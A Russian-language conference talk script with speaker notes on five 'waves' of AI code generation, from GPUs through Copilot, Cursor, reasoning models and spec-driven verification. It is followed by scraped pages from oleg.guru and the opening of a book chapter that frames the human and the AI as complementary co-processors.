Четыре года. BERT в 2018, GPT-2 в 2019, GPT-3 в 2020 — наука бурлит, но программисты ещё не заметили. Stack Overflow на пике, все пишут код руками. И вот 29 июня 2021 года GitHub показывает Copilot. Внутри — Codex, GPT-3, дообученная на коде. Обычный разработчик открывает VS Code, пишет комментарий «sort array by date descending» — и AI дописывает реализацию. 27% кода в enabled-файлах. Рождается comment-driven development — комментарии перестают быть выходом и становятся входом. Вы описываете *что*, машина пишет *как*. Параллельно появляется speculative decoding — маленькая модель генерирует, большая верифицирует. Acceptance rate 85%, ускорение в 2-3 раза. Пока чистая инфраструктура, но через пару лет это сделает reasoning-модели экономически жизнеспособными. Четыре года — от V100 до Copilot. Самая длинная волна.

🎯 НАПОМИНАЛКИ:
• Волна 2: A100 → масштаб → ChatGPT → смерть SO
• A100 80 ГБ HBM2e сделал GPT-3 физически возможным
• Scaling laws: предсказуемая отдача. Но InstructGPT: post-training > size
• ChatGPT: самая быстрая adoption в истории

📖 ТЕКСТ:
Вторая волна. Волна масштаба. A100 с 80 гигабайтами делает возможным GPT-3 со 175 миллиардами параметров. Kaplan публикует scaling laws — loss падает как степенная функция. Можно предсказать, сколько стоит «следующий уровень». Но внутри этой волны спрятан парадокс, который определит будущее.

🎯 НАПОМИНАЛКИ:
• A100 80 ГБ → GPT-3 175B → scaling laws (Kaplan)
• Scaling laws = степенной закон, «закон Мура для AI»
• InstructGPT: 1.3B RLHF > 175B GPT-3 → post-training > pre-training!
• CoT (Wei 2022): «think step by step» → кратное улучшение на рассуждениях
• H100 FP8 (2022): 4× throughput → квантизация без деградации

📖 ТЕКСТ:
A100 — 80 гигабайт HBM2e, 2 терабайта в секунду. GPT-3 тренируется на кластерах из этих карт. 175 миллиардов параметров. И Каплан показывает scaling laws: loss модели — степенная функция от параметров, данных, compute. Это дорожная карта: хочешь модель лучше — увеличь в 10 раз. Но внутри этой волны рождается парадокс. 2022 год: InstructGPT — модель в 1,3 миллиарда параметров с RLHF — побеждает GPT-3 в 175 миллиардов без RLHF. Маленькая, но «воспитанная» побеждает огромную, но «дикую». Wei et al. публикуют Chain-of-Thought: попроси модель «давай подумаем пошагово» — и точность растёт кратно. Простая идея, непропорциональный эффект. Масштаб важен, но post-training определяет полезность. H100 с нативным FP8 в том же году делает 4× throughput — квантизация становится бесплатной.

🎯 НАПОМИНАЛКИ:
• ChatGPT 30 ноября 2022 — точка невозврата
• SO: 108K → 96K (2 мес) → 25K (2 года). PNAS Nexus: −25% каузально
• SO увольнения: 10% (май '23), 28% (окт '23). Revenue $125M (training data!)
• Prompt Eng: 2 → 144 вакансий/млн. Anthropic: $335K роль
• QLoRA (Dettmers, май 2023): 65B на 1 GPU, 99.3% ChatGPT quality
• RAG: «просто сделай RAG» — стандартный ответ, 51% enterprise

📖 ТЕКСТ:
30 ноября 2022 — ChatGPT. И волна масштаба наконец докатилась до практик. Stack Overflow: 108 тысяч вопросов в ноябре, 96 тысяч в январе, 25 тысяч к декабрю 2024. Минус 76,5%. PNAS Nexus подтвердила каузальность, используя русские и китайские платформы как контроль. SO уволил 10%, потом ещё 28%. Ирония: revenue вырос до 125 миллионов — платформа ценнее как training data, чем как живое сообщество. Одновременно рождаются три практики. Prompt engineering: Indeed фиксирует прыжок с 2 до 144 вакансий на миллион за три месяца, Anthropic постит роль за 335 тысяч долларов. QLoRA позволяет fine-tuning 65-миллиардной модели на одном GPU — Dettmers назвал это «уравнивателем». RAG становится стандартным ответом на «как использовать LLM с нашими данными» — 51% enterprise AI. Вектор-БД получают сотни миллионов инвестиций за один месяц. Волна масштаба — самая «громкая». Она изменила культуру.

🎯 НАПОМИНАЛКИ:
• Волна 3: эффективность. FP8 + MoE + KV cache = больше за меньше
• H100 FP8 → квантизация без потерь
• MI300X 192 ГБ → конкуренция NVIDIA
• MoE: ~47B total, ~13B active → каждая frontier-модель 2025 = MoE
• Cursor: $1M → $100M ARR за 12 мес

📖 ТЕКСТ:
Третья волна — волна эффективности. Она поднимается из парадокса InstructGPT: если маленькая с post-training побеждает большую без — значит, путь не только «больше». Можно сделать «умнее при тех же ресурсах». И три технологии реализуют эту идею одновременно.

🎯 НАПОМИНАЛКИ:
• H100 FP8 → квантизация стала бесплатной
• MI300X 192 ГБ HBM3 → AMD впервые конкурентен
• MXFP4: 120B на одном H100, 90% MMLU → MoE доступен малым командам
• MoE: Mixtral → Qwen3-235B (128 experts, top-8). ResMoE 75% compression
• К 2025: *каждая* frontier-модель = MoE
• Mamba: O(n), 1M+ контекст, но для кода Transformer пока лучше
• KV cache оптимизация: разница между 100 и 600 пользователями на GPU

📖 ТЕКСТ:
H100 с нативным FP8 делает квантизацию бесплатной — обучение и inference в пониженной точности без деградации качества. MI300X от AMD — 192 гигабайта единой памяти, впервые модели на 2+ H100 помещаются в одну карту. MXFP4 — 120-миллиардная модель на одном H100 с 90% MMLU. Но главное — MoE, Mixture of Experts. Идея: не все 47 миллиардов параметров нужны для каждого токена. Маршрутизируйте каждый токен к ~13 миллиардам. Качество большой модели при стоимости маленькой. Mixtral показал, что это работает в продакшене. К 2025 году — Qwen3-235B со 128 экспертами, DeepSeek-V3, Grok-3. ResMoE сжимает экспертов на 75%. Каждая frontier-модель — MoE. Параллельно — Mamba: State Space Models с линейной сложностью. Единственный реальный конкурент Transformer. Для аудио и видео уже впечатляет, для кода — пока нет. И KV cache оптимизация: разница между 100 и 600 пользователями на одном GPU. Волна эффективности — это инфраструктура, которая сделала всё остальное экономически возможным.

🎯 НАПОМИНАЛКИ:
• Cursor: $1M → $100M ARR за 12 мес. $29.3B к 2026. Zero marketing
• 1B строк/день. 1M+ DAU. Half Fortune 500
• Cursor 2.0: Composer model (MoE+RL), 4× быстрее, 8 parallel agents
• Архитектура: RAG + Merkle tree + Turbopuffer, сотни ТБ embeddings
• Supermaven acquisition: 1M token context, 250ms latency
• Jensen Huang: «my favorite enterprise AI service»

📖 ТЕКСТ:
Волна эффективности породила Cursor. Основан в 2022, запущен в марте 2023 — четверо студентов из MIT сделали то, что не смог Microsoft: IDE, построенную вокруг AI, а не IDE с плагином. $1 миллион ARR, $100 миллионов ARR — за 12 месяцев. Самый быстрый SaaS-рост в истории. Без единого доллара на маркетинг. К 2026 — $29,3 миллиарда валюация, миллиард строк принятого кода в день. Cursor 2.0 имеет собственную модель — Composer, MoE-архитектура с RL, 4× быстрее аналогов, ~250 токенов в секунду. До 8 параллельных агентов. Под капотом — RAG с Merkle tree для отслеживания изменений, Turbopuffer vector DB, сотни терабайт эмбеддингов. Jensen Huang назвал Cursor «my favorite enterprise AI service». Это не «ещё один продукт» — это новая категория. AI-native IDE.

🎯 НАПОМИНАЛКИ:
• Google: >25% кода AI (Pichai). Copilot: 46% (Java 61%)
• Vogels: verification debt — ревью AI-кода сложнее, чем debug своего
• 85% devs используют AI daily (JetBrains 2025)
• AI-native IDE как категория: Cursor, Windsurf, потом Kiro, Antigravity
• MCP (ноябрь 2024): тихий запуск. Через год — стандарт индустрии

📖 ТЕКСТ:
Практики волны эффективности: «пиши меньше, ревьюй больше». Google признаёт, что больше 25% нового кода AI-сгенерировано. У активных Copilot-юзеров — 46%, а у Java-разработчиков — 61%. Werner Vogels на re:Invent вводит термин «verification debt»: когда ты пишешь код сам, понимание приходит в процессе создания. Когда машина пишет — ты должен восстановить это понимание при ревью. А это сложнее. AI-native IDE становится реальной категорией: Cursor, Windsurf. JetBrains 2025 показывает 85% adoption AI-инструментов. И в ноябре 2024 Anthropic тихо выпускает MCP — Model Context Protocol. Открытый стандарт подключения AI к инструментам. JSON-RPC, вдохновлённый LSP. Пока мало кто заметил. Но через год — 97 миллионов скачиваний, 10 тысяч серверов, и OpenAI, Google, Microsoft принимают его. «USB-C для AI.»

🎯 НАПОМИНАЛКИ:
• Волна 4: reasoning. Самая важная научно
• B200 FP4 делает inference scaling экономичным
• GRPO = главное открытие 2025: reasoning из чистого RL
• o1 → R1 (open-weight) → Claude Code + Codex → vibe coding + agents

📖 ТЕКСТ:
Четвёртая волна. Волна Reasoning. Она начинается с нового железа — B200 с нативным FP4 — и приходит к самому важному научному открытию 2025 года. Эта волна перевернула парадигму: оказалось, что reasoning не нужно программировать и не нужно показывать примерами. Оно возникает само.

🎯 НАПОМИНАЛКИ:
• B200: FP4, 2.5× inference. Делает TTC экономически оправданным
• Groq: SRAM-based, 300 т/с. NVIDIA купила за $20B — inference = отдельный рынок
• TPU v6: 4.7× vs v5e. Google конкурирует на своём железе
• TTC: 7B + search > 34B. Paradigm shift: compute at inference, not training
• DPO (Rafailov): прямая policy optimization, без reward model
• Cerebras WSE-3: 4T транзисторов, wafer-scale

📖 ТЕКСТ:
B200 — нативный FP4, 2.5× inference по сравнению с H100. Это делает test-time compute scaling экономически оправданным: можно тратить больше вычислений на inference, потому что каждый FLOP стоит меньше. Groq показывает, что inference-чип может быть принципиально другим: SRAM вместо DRAM, детерминизм, 300 токенов в секунду. NVIDIA купит Groq за 20 миллиардов — потому что inference и training требуют разного железа. TPU v6 показывает 4.7× — Google начинает конкурировать на своём железа. И тут приходит Test-Time Compute Scaling: Llemma-7B с tree search побеждает Llemma-34B на всех стратегиях. «Думай дольше, а не больше» — разворот парадигмы. А DPO убирает reward model из RLHF — alignment становится доступным командам без тысяч GPU.

🎯 НАПОМИНАЛКИ:
• GRPO = Group Relative Policy Optimization (DeepSeek)
• R1-Zero: base model + RL (только correctness reward) → reasoning emerges
• Emergent: self-reflection, verification, «aha moments»
• AIME: 15.6% → 71%, 86.7% majority voting (= o1)
• Nature сентябрь 2025 — уровень «Attention Is All You Need»
• Дополнительно: SCoT (if/else/for для CoT), Code-First CoT (+9.86%)

📖 ТЕКСТ:
GRPO. Group Relative Policy Optimization от DeepSeek. Это главное научное открытие 2025 года, и я не преувеличиваю. Возьмите базовую модель. Не давайте ей ни одного примера рассуждений. Только сигнал «правильно» или «неправильно» на математических задачах. Запустите RL. Что произойдёт? Reasoning *возникнет сам*. DeepSeek-R1-Zero показала прыжок с 15,6% до 71% на AIME 2024. Появились emergent behaviors, которые никто не программировал: self-reflection, verification, и «aha moments» — когда модель поправляет ход мысли в процессе рассуждения. Вышло в Nature. Почему это на уровне «Attention Is All You Need»? Потому что раньше для reasoning нужны были дорогие человеческие примеры. Теперь — дай сигнал «верно/неверно» и reasoning возникнет. Это меняет парадигму тренировки. Параллельно — SCoT показывает, что рассуждения через if/else/for работают лучше, чем через естественный язык. А Code-First CoT: генерируй код СНАЧАЛА, объяснение ПОТОМ — на 9,86% лучше.

🎯 НАПОМИНАЛКИ:
• Claude Code: CLI, in-the-loop, 80.9% SWE-bench (Opus 4.5), $1B ARR
• Codex: cloud, async, 56.8% SWE-bench Pro, 77.3% Terminal-Bench
• Два подхода сходятся: оба добавляют features друг друга
• o1: первая reasoning-модель в проде
• R1 open-weight: 7B = 55.5% AIME → thinking для всех
• Copilot: 20M+ users, 42% market, 1.2M PRs/month

📖 ТЕКСТ:
Два продукта, два подхода. Claude Code — CLI-агент в терминале, рядом с вами. In-the-loop: вы видите, что он делает. 80,9% SWE-bench Verified с Opus 4.5 — первая модель выше 80%. 90% собственного кода Claude Code пишет сам. Миллиард долларов ARR. Codex от OpenAI — другая философия: облачный, асинхронный. Отправляете задачу, идёте пить кофе, получаете PR. 56,8% на SWE-bench Pro — более сложном бенчмарке. 77,3% Terminal-Bench. Два подхода, но они сходятся — оба добавляют features друг друга. OpenAI o1 — первая reasoning-модель в продакшене: 30 секунд думает, потом правильный ответ. DeepSeek-R1 с открытыми весами: 7-миллиардная модель показывает 55,5% AIME — каждый может запустить «думающую» модель локально. Copilot тем временем вырос до 20 миллионов пользователей, 42% рынка, и генерирует 1,2 миллиона PR в месяц.

🎯 НАПОМИНАЛКИ:
• Vibe coding: Karpathy 2 фев, 4.5M просмотров, Collins WotY 2025
• YC W25: 25% стартапов = 95% AI-код. Но 72% профи = «не мой метод»
• Willison: «если ревьюишь — не vibe coding, а typing assistant»
• Агентное программирование: 1.2M PR/мес Copilot, Claude Code, Codex
• AI code review: 14.8% → 51.4% (Jellyfish), 81% quality improvement (Qodo)
• CodeRabbit: vibe-coded = 1.7× major issues, 2.74× security vulns

📖 ТЕКСТ:
Волна reasoning породила культурный момент. 2 февраля 2025 — Карпати: «Vibe coding — забудь, что код существует, accept all, не читай дифы.» 4,5 миллиона просмотров. Collins Word of the Year. Y Combinator: 25% стартапов — 95% AI-код. Но контрапункт: 72% профессионалов говорят «это не мой метод». Willison уточняет: если ты всё ревьюишь и тестируешь — это не vibe coding, а AI как typing assistant. Агентное программирование — новая практика: «AI реализует фичи, пока я занят другим». Claude Code, Codex, Copilot Agent генерируют 1,2 миллиона PR в месяц. AI code review: с 14,8% в январе до 51,4% в октябре. AI в каждом седьмом PR. Но CodeRabbit показал обратную сторону: vibe-coded PR содержат в 1,7 раза больше major issues и в 2,74 раза больше security-уязвимостей.

🎯 НАПОМИНАЛКИ:
• Волна 5: верификация. Ответ на adoption-trust парадокс
• NVFP4 → длинный контекст → больше верификации за те же деньги
• Astrogator: domain-specific verification работает (83/92%)
• Kiro: spec-driven. Antigravity: agent-first
• MCP: 97M downloads. Spec-driven dev. Команды 30-60 → 2-5

📖 ТЕКСТ:
Пятая волна. Она только начинается, и она отвечает на главный вопрос: «как доверять AI-коду?» 85% разработчиков используют AI, но только 29% доверяют результатам. Волна верификации — ответ на этот разрыв. И она тоже начинается с железа.

🎯 НАПОМИНАЛКИ:
• NVFP4: 50% меньше памяти → длинный контекст дешевле → больше для верификации
• Astrogator: FQL, domain-specific, 83/92% — production-ready путь
• CoT+RAG: 100% спеки, 58% верификация — недостаточно для прода
• Auto-formalization: мертво. Domain-specific: жив
• Free Transformer: latent variables для planning, +11% код (8B)
• EvoMAC: самоэволюция агентных топологий

📖 ТЕКСТ:
NVFP4 — 4-битный KV-кеш. 50% сокращение памяти. Звучит как микрооптимизация, но это 50% больше контекста на том же GPU — а длинный контекст критичен для верификации: нужно держать в памяти и код, и спецификации, и тесты. QuantSpec, ShadowKV, MagicDec — вместе делают 128K контекст управляемым. Наука верификации разделилась на два пути. Astrogator показал, что domain-specific формальная верификация работает: 83% верификация корректного кода, 92% детекция некорректного. Для конкретного домена, конкретного языка — production-ready. Но general auto-formalization? CoT+RAG даёт 100% синтез спецификаций, но только 58% реальная верификация. Полная авто-формализация — тупик, по крайней мере сейчас. Free Transformer от Meta — интересный поворот: модель планирует направление генерации до первого символа через латентные переменные. +11% на кодогенерации. EvoMAC — агенты, которые перестраивают собственную топологию. Путь к верифицированному коду — domain-specific, не general.

🎯 НАПОМИНАЛКИ:
• Kiro: spec-driven. Brooker: «спецификация = version-controlled super prompt»
• Böckeler (Thoughtworks): «sledgehammer to crack a nut» для мелких багов
• Antigravity: agent-first, Manager View, artifacts для trust
• SWE-bench: 2% → 75% за 2 года (37×)
• SWE-bench Pro решает data contamination: GPL public + commercial code

📖 ТЕКСТ:
Kiro от AWS — ответ на вопрос «как управлять агентами?» через спецификации. Вместо промптов — requirements.md, design.md, tasks.md. Marc Brooker: «спецификация — это version-controlled, human-readable super prompt». Birgitta Böckeler из Thoughtworks критикует: для простого бага — sledgehammer to crack a nut. Но для больших фич — это работает. Google запускает Antigravity — agent-first IDE, где Manager View позволяет запустить 5+ автономных агентов и следить за ними как за командой. Артефакты, скриншоты, recordings — как доказательства того, что агент сделал правильно. SWE-bench: с 2% в 2023 до 75% в 2025. 37 раз за два года. SWE-bench Pro появился, чтобы решить проблему data contamination: GPL-код в public set, commercial codebases в private.

🎯 НАПОМИНАЛКИ:
• MCP: 97M downloads, 10K+ серверов, LF donation. «USB-C для AI» = реальность
• Команды: 30-60 → 2-5 (Salva/Google). 23% бюджет → AI tools (Jellyfish)
• Джуниоры: −20% занятость (Stanford), −5/квартал (Harvard), 54% лидеров: меньше наймём
• 44% организаций: падение фундаментальных навыков у джуниоров
• Prompt engineer: роль умирает, навык остаётся. Microsoft: «предпоследнее место» среди новых ролей

📖 ТЕКСТ:
MCP — тихо запущенный в ноябре 2024 — взорвался. 97 миллионов скачиваний, 10 тысяч серверов. OpenAI, Google, Microsoft приняли. В декабре 2025 — Linux Foundation. Трудно вспомнить другую технологию, получившую единогласную поддержку всех конкурентов. Команды сжимаются: Ryan Salva из Google описывает переход от 30-60 до 2-5 человек на фичу. Collison из Stripe: «minimum viable team size collapsed». 23% организаций перераспределяют бюджет с headcount на AI tools. Кризис джуниоров: Stanford показывает -20% занятости среди 22-25 лет, Harvard — минус 5 джуниоров в квартал. 44% организаций наблюдают падение фундаментальных навыков. И prompt engineering как отдельная роль умирает — с 144 до 20-30 вакансий на миллион. Но 68% компаний обучают всех промптингу — навык стал универсальным.

🎯 НАПОМИНАЛКИ:
• 85% adoption, 29% trust, 66% «almost right but not quite»
• Favorability: 77% → 60%. «Willing but reluctant»
• METR: +20% ожидание, −19% реальность = 40 п.п. gap
• 69% продолжили пользоваться после эксперимента!
• Sonar: toil = 23-25% const. Вид toil меняется, объём — нет
• DORA 2025: AI = усилитель, не уравниватель

📖 ТЕКСТ:
Вот центральный парадокс, который объединяет все пять волн. 85% разработчиков используют AI ежедневно. Но только 29% доверяют результатам — падение с 42% за год. 66% говорят: «почти правильно, но не совсем» — это главная боль. Favorability: с 77% до 60%. «Willing but reluctant.» METR — золотой стандарт, рандомизированное контролируемое испытание. 16 опытных open-source разработчиков, 246 задач. Думали, что AI делает их на 20% быстрее. Реальность: на 19% медленнее. 40 процентных пунктов разрыв. Но 69% продолжили пользоваться после эксперимента! Sonar добавляет деталь: toil остаётся 23-25% вне зависимости от AI. Работа не исчезла — сместилась от написания к верификации. DORA 2025 сказали лучше всех: «AI усиливает сильные стороны высокоэффективных организаций и дисфункции слабых.» Не уравниватель — усилитель.

🎯 НАПОМИНАЛКИ:
• Slopsquatting: 19.7% hallucinated deps, 43% repeatable → attack vector
• 40% GPT-кода с vulns (Trend Micro), 73% CWE (Georgetown)
• CodeRabbit: 470 PRs, vibe-coded = 1.7× major, 2.74× security vulns
• 3% highly trust. 75% manually review every snippet
• MCP CVE-2025-6514: 437K compromised envs — стандарт = attack surface
• Lovable: 170/1645 apps с security vulns exposing personal info

📖 ТЕКСТ:
Цена скорости. USENIX 2025: 19,7% зависимостей в AI-сгенерированном коде — несуществующие пакеты. Модели галлюцинируют имена. 43% повторяются — предсказуемые цели. Атакующие регистрируют пакеты с этими именами и вредоносным кодом. «Slopsquatting.» 40% GPT-кода содержит уязвимости по Trend Micro, Georgetown нашли CWE в 73% образцов. CodeRabbit проанализировал 470 PR с vibe-coded контентом: 1,7× больше major issues, 2,74× больше security-уязвимостей. Только 3% разработчиков «высоко доверяют» AI-коду. MCP — новый стандарт, но и новый attack surface: CVE-2025-6514 скомпрометировал 437 тысяч dev-окружений. Lovable: 170 из 1645 созданных web-приложений имели security-уязвимости, раскрывающие персональные данные. Это не теоретические риски.

🎯 НАПОМИНАЛКИ:
• Одна картинка = все пять волн
• Задержка сжимается: 4 → 3 → 2 → 1 → 0.5 года
• Волны перекрываются: 5-я начинается, когда 3-я не закончилась
• Каждая строка: HW → Science → Product → Practice
• Hardware определяет всё — каждый прорыв упирался в железо

📖 ТЕКСТ:
Вот все пять волн на одном слайде. Обратите внимание на задержки. Первая волна: 4 года от V100 до Copilot. Вторая: 3 года от A100 до ChatGPT-эффектов. Третья: 2 года от H100 FP8 до Cursor-бума. Четвёртая: год от B200 до агентного программирования. Пятая: 6 месяцев от NVFP4 до spec-driven development. Каскад ускоряется. И волны перекрываются — пятая начинается, когда третья ещё не закончилась. Каждая строка: чип → наука → продукт → практика. Уберите любой чип — и следующей волны не будет. Hardware определяет всё.

🎯 НАПОМИНАЛКИ:
• 5 takeaways, каждый — одно предложение
• Железо → наука → продукт → практика (каскад)
• GRPO = paradigm shift. Reasoning = emergent
• Три scaling laws сходятся. Баланс > размер
• Усилитель, не замена. METR: −19% реальность при +20% ощущении
• Спецификации > промпты. Domain-specific > general

📖 ТЕКСТ:
Пять вещей. Первое: следите за железом. Новый чип — это предсказание на 1-3 года вперёд. Когда NVIDIA анонсирует что-то — думайте, какую науку это сделает возможной, и какой продукт появится через год. Второе: GRPO — самое важное открытие 2025 года. Reasoning из чистого RL, без человеческих примеров. Emergent property. Третье: три закона масштабирования сходятся. Будущее — не «сделай больше», а «распредели умнее» между pre-training, post-training и inference. Четвёртое: AI — усилитель. METR показал: -19% скорости при +20% ощущении. DORA: усиливает сильных, обнажает слабых. Работа сместилась от написания к верификации, но не исчезла. Пятое: будущее за спецификациями и domain-specific верификацией. Не «напромпти лучше», а «специфицируй точнее». Astrogator, а не full auto-formalization.

🎯 НАПОМИНАЛКИ:
• Karpathy: vibe coding — культурный сдвиг
• DORA: усилитель — трезвая правда
• Brooker: спецификация > промпт — будущее
• Solar-Lezama: без AI примитивно — эмоциональная правда

📖 ТЕКСТ:
Четыре цитаты. Карпати — культурный сдвиг: забудь, что код существует. DORA — трезвая правда: AI не делает всех лучше, он усиливает то, что уже есть. Brooker — будущее: спецификация как super prompt. И Solar-Lezama из MIT — эмоциональная правда: без этих инструментов уже «примитивно». Пять волн за девять лет. От Tensor Cores до верифицированной кодогенерации. От четырёх лет задержки до шести месяцев. И каждая волна начиналась с железа.

🎯 НАПОМИНАЛКИ:
• Поблагодарить. Визуализация доступна. Вопросы?
• Готовность к вопросам: METR, GRPO, vibe coding, безопасность, джуниоры

📖 ТЕКСТ:
Спасибо за внимание! У меня есть интерактивная визуализация — HTML-страница со всеми связями между слоями. Три markdown-файла с полным исследованием. Давайте обсудим — какая из пяти волн резонирует с вашим опытом? Что вы видите на горизонте?


=================================================
# LONG-FORM
=================================================


---
## URL: https://oleg.guru/ru/chat-vs-file
## Title: Чат против файлов: 80 лет истории — от перфокарт до Spec-Driven Development
---

Чат против файлов: 80 лет истории — от перфокарт до Spec-Driven Development

- 
- 
- 
- 

Чат против файлов: 80 лет истории

80 лет повторяющегося цикла — 1945–2026

# Hardware → Science → Products → Practices

Каждая революция в computing повторяет один и тот же цикл: новое железо делает возможным интерактивный «чатовый» интерфейс, который потрясает воображение — а потом файловый/спецификационный подход побеждает в продакшене. Каждый. Раз. Нажмите на узел — увидите связи и подробности.

Специально для Telegram-канала 1red2black (Откровения от Олега)

✳oleg.guru

Hardware

Железо

Science

Языки

AI Research

Парадигмы

Инфраструктура

Products

Interactive / Chat

File / Batch

Гибрид

Practices

Chat побеждает?

File побеждает

Паттерн

✕ Сбросить фильтр

Computing: 80 лет цикла «Chat vs File» — от перфокарт до Spec-Driven Development — 2026
Нажмите на узел для подробностей · Esc для сброса


---
## URL: https://oleg.guru/ru/timeline
## Title: Новое лето искусственного интеллекта — Hardware → Science → Products → Practices
---

Новое лето искусственного интеллекта — Hardware → Science → Products → Practices

- 
- 
- 
- 

Новое лето искусственного интеллекта

Четырёхслойная визуализация — февраль 2026

# Hardware → Science → Products → Practices

Как железо порождает открытия, открытия превращаются в инструменты, а инструменты меняют то, как разработчики и data scientists работают каждый день. Нажмите на узел — увидите связи и подробности.

Специально для Telegram-канала 1red2black (Откровения от Олега)

✳oleg.guru

Hardware

GPU / Accelerator

Science

Архитектура

Рассуждения

Инфраструктура

Верификация

Агенты

Products

IDE / Copilot

Coding Agent

Платформа

Модель

Practices

SWE

DS / ML

Обе аудитории

✕ Сбросить фильтр

AI Code Generation: Hardware → Science → Products → Practices — февраль 2026
Нажмите на узел для подробностей · Esc для сброса · Ссылки внутри панели ведут к связанным узлам


=================================================
# SETTINGS
=================================================


---
## URL: https://oleg.guru/citizenship
## Title: Моё гражданство — oleg.guru
---

Моё гражданство — oleg.guru

- 
- 
- 
- 
- 

✵ oleg.guru

RU
|
EN

# 

🇷🇺 
✓

🌍 
✓

🗑


=================================================
# RED BOOK CHAPTER SOURCES (markdown sources)
=================================================


---
## Source: content/redbook/two-process-model.md
## Title: Два процесса, одна задача
---

Подробности об использовании документа — в разделе [Safe Harbor](safeharbor.md).

# Глава первая.<br>Два процесса, одна задача

*Почему отношения «начальник → подчинённый» и «человек → инструмент» не работают. Модель сопроцессоров. Как устроено разделение когнитивной нагрузки. Что может только человек, что может только AI, и где пересечение.*

## Неправильные метафоры

Когда человек впервые садится работать с языковой моделью над реальным проектом (не над игрушечным «Hello World на Rust» и «TODO-list на React»), а над чем-то, что должно работать в продакшене, — он неизбежно начинает с одной из двух ментальных моделей.

**Модель «начальник — подчинённый».** Человек формулирует задачу. AI выполняет. Человек проверяет. AI исправляет. Это привычная схема — так устроена большая часть рабочих отношений в индустрии разработки. Начальник знает, что нужно сделать, а подчинённый знает, как это обычно делается. Ответственность это привилегия и проклятье начальника, бездумное исполнение остается на линейных сотрудниках.

Проблема в том, что AI — плохой подчинённый. Он не запоминает контекст между сессиями. Он не переспрашивает, когда задача неясна — вместо этого угадывает (часто, угадывает неправильно). Он не говорит «я не понял», а сразу генерирует уверенно выглядящий отборный ИИ-слоп, который может быть полностью неверным. Он не учится на ваших прошлых замечаниях — каждая новая сессия начинается с чистого листа. По крайней мере, такова механика нейросетей без использования дополнительного инструментария.

Но главная проблема не в этих ограничениях. Главная проблема — в распределении когнитивной нагрузки. В модели «начальник — подчинённый» вся интеллектуальная работа лежит на начальнике: планирование, декомпозиция задач, верификация результатов, поддержание общей картины. AI в этой модели — просто чуть более быстрые руки, чем у самого начальника.

Но если вам нужны только быстрые руки, зачем платить за самую мощную языковую модель в мире?

Если вы хоть раз работали начальником, вам должна быть знакома боль, когда исполнители постоянно подходят и спрашивают у тебя «а как это делать, я же не умею!». Время тратится не на настоящую работу (стратегию, вижен, политику, и в конечном счёте — getting things done), а на «руко-водство», т.е. натурально — вождение чужими руками. Если в это слишком сильно залипнуть, то вся настоящая работа будет полностью провалена, и проект пойдет на дно. Наверное, все это видели много раз. Повторить всё то же самое, но только с языковой моделью — было бы вдвойне тупо.

**Модель «человек — инструмент».** Человек использует AI как продвинутый автокомплит. Пишет начало функции, AI дописывает. Описывает компонент одним предложением, AI генерирует код. Это то, что инфоцыгане называют «AI-ассистент» — помощник, который ускоряет рутину.

Почему инфоцыгане? Да кто бы еще мог внятно объяснить, как эта модель может помочь с чем-то серьезным. Для маркетолога важна красота аналогии, яркость метафоры. Тут метафора ясная, AI-ассистент - это такой виртуальный секретарь, который делает тучу работы, а в промежутках приносит горячий кофе и томно заглядывает в глаза. Теперь вы как разработчик, представьте — вы смогли бы так писать код, общаясь с кодом через секретаря? Постоянно кричать «Аллочка, у нас отмена»?

Эта модель работает для мелких задач. Но для проекта длиной в месяцы она разрушительна. Потому что инструмент не имеет собственного «понимания» проекта. Он не видит общую картину. Он оптимизирует локально — текущий файл, текущую функцию — и может при этом разрушать глобальную согласованность системы. Каждое использование «инструмента» — это отдельный акт, не связанный с предыдущими.

В обеих моделях есть общая ошибка: **человек берёт на себя 100% когнитивной нагрузки**. AI выполняет механическую работу — набирает текст, генерирует шаблонный код, форматирует. Но думает только человек. А потом человек выгорит в угли, конечно же. К сожалению, человек не железный и не предназначен для 100% загрузки мозга совершенно новыми не-рутинными задачами. 

В этих моделях, ИИ — это такой компилятор на стероидах, не очень точный и не очень качественный. Это лишает систему её главного преимущества — возможности распределить *мышление* между двумя принципиально разными типами интеллекта.

## Что такое сопроцессор

Есть третья модель, и она работает (по крайней мере у меня). Но она требует ментального переключения, которое многим даётся тяжело — особенно опытным разработчикам.

Представьте себе систему из двух процессоров, работающих над одной задачей. Не один главный и один вспомогательный — два равноправных процессора с *разной архитектурой*. Как CPU и GPU в современном компьютере: CPU хорош в последовательных вычислениях со сложными зависимостями, GPU — в массивном параллелизме простых операций. Они не конкурируют за звание самого главного и «лучшего». Они *разные*, и сила системы — в их комбинации.

Человек и AI — это два процесса с радикально разной архитектурой:

**Процесс «Человек»** оптимизирован для:
- Persistent memory — помнит всё между сессиями, неделями, годами;
- Семантическое понимание — видит *намерение* за словами,
чувствует «дух» решения, а не только его букву;
- Интуиция — ощущает «что-то не так» до того, как может
это формализовать;
- Медленная, но глубокая верификация — может проследить
цепочку зависимостей через весь проект;
- Принятие решений в условиях неопределённости;
- Вкус — эстетические, этические, UX-решения.

**Процесс «Человек»** плохо справляется с:
- Высокой пропускной способностью — читает и пишет медленно;
- Механической согласованностью — пропускает опечатки,
забывает обновить связанные файлы;
- Удержанием большого количества деталей одновременно (7±2);
- Рутинными повторяющимися операциями;
- Работой под усталостью и стрессом;
- Удержанием фокуса в виртуальном мире — его постоянно отвлекает мир реальный.

**Процесс «AI»** оптимизирован для:
- Высокой пропускной способности — генерирует тысячи строк
кода за минуты;
- Механической согласованности в рамках одной сессии;
- Широкой, хотя и неглубокой эрудиции — знает синтаксис
десятков языков, API сотен библиотек;
- Рутинных операций — рефакторинг, форматирование, шаблонный код;
- Работы с формальными структурами — парсинг, трансформация,
генерация по шаблону;
- Абсолютной неутомимости (в пределах сессии и квадратичного бюджета токенов).

**Процесс «AI»** плохо справляется с:
- Persistent memory — забывает всё между сессиями;
- Семантическим пониманием — следует букве, не духу;
- Поддержанием когерентности на длинных дистанциях;
- Принятием решений, требующих контекста за пределами окна
- Обнаружением собственных ошибок;
- Волей — не может сам начать работу, сам поставить задачу, а когда всё-таки делает это с помощью специального тулинга — эпически проваливается на пересечении с реальным миром.

Ключевое наблюдение: **эти наборы свойств комплементарны**. Слабости одного процесса — это силы другого. Человек медленный, но всё помнит и держит когерентность воспоминаний между итерациями. AI быстрый, но всё забывает. Человек видит общую картину, но не может удержать все детали. AI удерживает детали, но не видит картину целиком.

Конечно же, тут надо не вдаваться в абсолютную идеализацию памяти человека. Я с трудом помню, что было два месяца назад, а всё что было далее двух лет - это воспоминания как будто бы другого человека. Но в случае определенной ментальной дисциплины и дистанций в несколько месяцев, когнитивное ядро человека всё ещё работает бесконечно лучше нейросети.

